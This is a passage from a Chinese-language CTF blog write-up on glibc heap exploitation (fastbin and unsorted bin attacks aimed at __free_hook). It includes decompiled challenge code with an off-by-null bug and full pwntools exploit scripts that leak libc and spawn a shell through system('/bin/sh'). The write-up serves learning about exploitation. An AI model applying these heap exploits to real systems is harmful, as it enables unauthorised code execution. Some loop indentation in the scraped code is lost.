    libc_base = main_arena - unsorted_bin_offset - main_arena_offset
    __malloc_hook = libc_base + __malloc_hook_offset
    __free_hook = libc_base + __free_hook_offset
    libc_realloc = libc_base + realloc_offset
    libc_system = libc_base + system_offset

    # chunk_overlap + uaf
    chunk_2 = add(0x58)
    chunk_3 = add(0x58)
    chunk_4 = add(0x68)
    edit(2, 0x58 + 10, "D" * 0x58 + "\x71")
    edit(4, 0x10, p64(0) + p64(0x21))
    delete(3)
    chunk_3 = add(0x68)
    edit(3, 0x60, "E" * 0x50 + p64(0) + p64(0x71))
    delete(4)
    edit(3, 0x68, "E" * 0x50 + p64(0) + p64(0x71) + p64(__malloc_hook - 0x23))
    chunk_4 = add(0x68)

    # create size area for malloc fastbin over main_arena->top_chunk
    chunk_5 = add(0x68)
    edit(5, 0x33, "F" * 0x13 + p64(0) + p64(0x71) * 3)

    # uaf again
    delete(4)
    edit(3, 0x68, "E" * 0x50 + p64(0) + p64(0x71) + p64(__malloc_hook))
    chunk_4 = add(0x68)
    chunk_6 = add(0x68)
    edit(6, 0x68, "\x00" * 0x60 + p64(__free_hook - 0xb58))

    # use unsorted bin
    for i in range(7):
    chunk_7 = add(0x100)
    delete(7)
    for i in range(7):
    chunk_7 = add(0xE8)
    delete(7)

    # write __free_hook
    chunk_7 = add(0xE8)
    edit(7, 0x80, "/bin/sh\x00" + "\x00" * 0x70 + p64(libc_system))

    # trigger __free_hook
    delete(7)

    success("main_arena: " + hex(main_arena))
    success("libc_base: " + hex(libc_base))
    success("__malloc_hook: " + hex(__malloc_hook))
    success("__free_hook: " + hex(__free_hook))
    success("libc_system: " + hex(libc_system))

    p.interactive()

unsorted bin attack to create size over __free_hook

同样是打__free_hook,只不过这次是用fastbin attack,通过unsorted bin attack在__free_hook上方伪造size提供给fastbin attack进行利用。

原理

unsorted bin attack的攻击原理这里就不再二次赘述了,可参考BookWriter

只是有一点需要注意,由于进行了unsorted bin attack之后,还需要保持程序的正常运行进行后续利用,所以要保证不能再出现存取unsorted bin的情况(此时unsorted bin链表已经损坏),因此要保证进行unsorted bin attack时,malloc申请的大小要正好等于unsorted bin的大小,否则会有一个unsorted bin切割后重新入链的操作,从而使程序crash掉。

同时,若unsorted bin的size是伪造的,注意该size同样必须满足unsorted bin的size约束,否则同样会crash。

举例

Secret Of My Heart

add功能中set_data存在明显的off by null漏洞:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
int add()
{
signed int i; // [rsp+4h] [rbp-Ch]
size_t v2; // [rsp+8h] [rbp-8h]

for ( i = 0; ; ++i )
{
if ( i > 99 )
return puts("Fulled !!");
if ( !*(_QWORD *)(chunk_array + 0x30LL * i + 0x28) )
break;
}
printf("Size of heart : ");
v2 = (signed int)choice();
if ( v2 > 0x100 )
return puts("Too big !");
set_data((size_t *)(chunk_array + 48LL * i), v2);
return puts("Done !");
}

_BYTE *__fastcall set_data(size_t *a1, size_t a2)
{
_BYTE *result; // rax
size_t size; // [rsp+0h] [rbp-20h]

*a1 = a2;
printf("Name of heart :", a2);
read_data(a1 + 1, 0x20u);
a1[5] = (size_t)malloc(size);
if ( !a1[5] )
{
puts("Allocate Error !");
exit(0);
}
printf("secret of my heart :", 32LL);
result = (_BYTE *)(a1[5] + (signed int)read_data((void *)a1[5], size));
*result = 0;
return result;
}

主要利用思路:

  1. 利用add中的off by null,触发unsorted bin的unlink形成chunk overlap。
  2. 利用chunk overlap先leak出libc的地址。
  3. 通过unsorted bin attack将__free_hook-0x50-0x10处写入main_arena的地址。
  4. __free_hook-0x50-0x10处写入的main_arena的地址的高字节0x7F作为size,进行fastbin attack,将system写入__free_hook
  5. free一个包含”/bin/sh”的chunk,getshell(本地没打通,远程打通了,有点奇怪)。
    我的exp:
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    77
    context.log_level = "debug"

    def add(size, name, content):
    p.sendlineafter("Your choice :", "1")
    p.sendlineafter("Size of heart : ", str(size))
    p.sendafter("Name of heart :", name)
    p.sendafter("secret of my heart :", content)

    def view(index, label):
    p.sendlineafter("Your choice :", "2")
    p.sendlineafter("Index :", str(index))
    p.recvuntil(label)

    def delete(index):
    p.sendlineafter("Your choice :", "3")
    p.sendlineafter("Index :", str(index))

    unsorted_bin_offset = 0x58
    main_arena_offset = 0x3c3b20
    system_offset = libc.symbols["system"]
    __free_hook_offset = libc.symbols["__free_hook"]
    # realloc_offset = libc.symbols["realloc"]

    # unlink and chunk overlap
    add(0xF8, "AAAA", "AAAA") # chunk 0
    add(0x38, "BBBB", "BBBB") # chunk 1
    add(0x38, "CCCC", "CCCC") # chunk 2
    add(0xF8, "DDDD", "DDDD") # chunk 3
    add(0x18, "EEEE", "EEEE") # chunk 4
    delete(2)
    add(0x38, "CCCC", "C" * 0x20 + p64(0) + p64(0x21) + p64(0x180)) # chunk 2
    delete(0)
    delete(3)
    delete(4)

    # leak libc
    add(0xF8, "AAAA", "AAAA") # chunk 0
    view(1, "Secret : ")
    main_arena = u64(p.recv(6).ljust(8, "\x00"))
    libc_base = main_arena - unsorted_bin_offset - main_arena_offset
    __free_hook = libc_base + __free_hook_offset
    libc_system = libc_base + system_offset

    # recover the unsorted bin
    delete(0)

    # chunk overlap
    add(0xE8, "AAAA", "AAAA") # chunk 0
    add(0xF8, "DDDD", p64(0) + p64(0x61) + "D" * 0x58 + p64(0x21)) # chunk 3
    delete(1)
    delete(3)

    # chunk overlap again
    add(0xF8, "BBBB", "B" * 0x48 + p64(0x71) + "B" * 0x68 + p64(0x21)) # chunk 1
    delete(2)
    delete(1)

    # unsorted bin attack
    add(0x98, "BBBB", p64(0) + p64(0x61) + "B" * 0x30 + p64(0) + p64(0x71)) # chunk 1
    add(0x58, "CCCC", "\x00" * 0x30 + p64(0) + p64(0x71) + p64(__free_hook - 0x43)) # chunk 2
    add(0x68, "DDDD", "\x00" * 0x40 + p64(0) + p64(0xA1) + p64(main_arena) + p64(__free_hook - 0x50)) # chunk 3

    # trigger unsorted bin attack
    add(0x98, "EEEE", "EEEE") # chunk 4

    # write __free_hook
    add(0x68, "FFFF", "\x00" * 0x33 + p64(libc_system)) # chunk 5

    # trigger __free_hook
    add(0x18, "GGGG", "/bin/sh\x00") # chunk 6
    delete(6)

    success("libc_base: " + hex(libc_base))
    success("libc_system: " + hex(libc_system))
    success("__free_hook: " + hex(__free_hook))

    p.interactive()

write _IO_FILE vtable

这个还没有接触到过,也没有自己实现过,待补充。

小结

  • 之前确实有碰到过__malloc_hook改onegadget一次打不通的情况,但是都是通过realloc调整实现的(还以为通用了,结果打脸了),这次好几道题都没办法用这种办法实现,所以学习了一波。
  • 确实没有遇到过改top chunk的利用方法,这次算是学到了。
  • __free_hook还是比__malloc_hook稳,onegadget的约束有的时候真的是太难满足了。
  • 发现两道利用malloc_printerr触发__malloc_hook的从而onegadget来getshell的题目,都是用的[rsp+0x50]==NULL这个约束,是小概率还是大概率还是必然?

相关链接

  1. https://bbs.pediy.com/thread-225973.htm
  2. https://xuanxuanblingbling.github.io/ctf/pwn/2020/03/21/garden/
  3. https://www.anquanke.com/post/id/171283#h2-0
  4. https://bbs.pediy.com/thread-230028.htm
  5. https://elixir.bootlin.com/glibc/glibc-2.23/source
Author: Nop
Link: https://n0nop.com/2020/04/15/Fastbin-attack-%E5%B0%8F%E7%BB%93/
Copyright Notice: All articles in this blog are licensed under CC BY-NC-SA 4.0 unless stating additionally.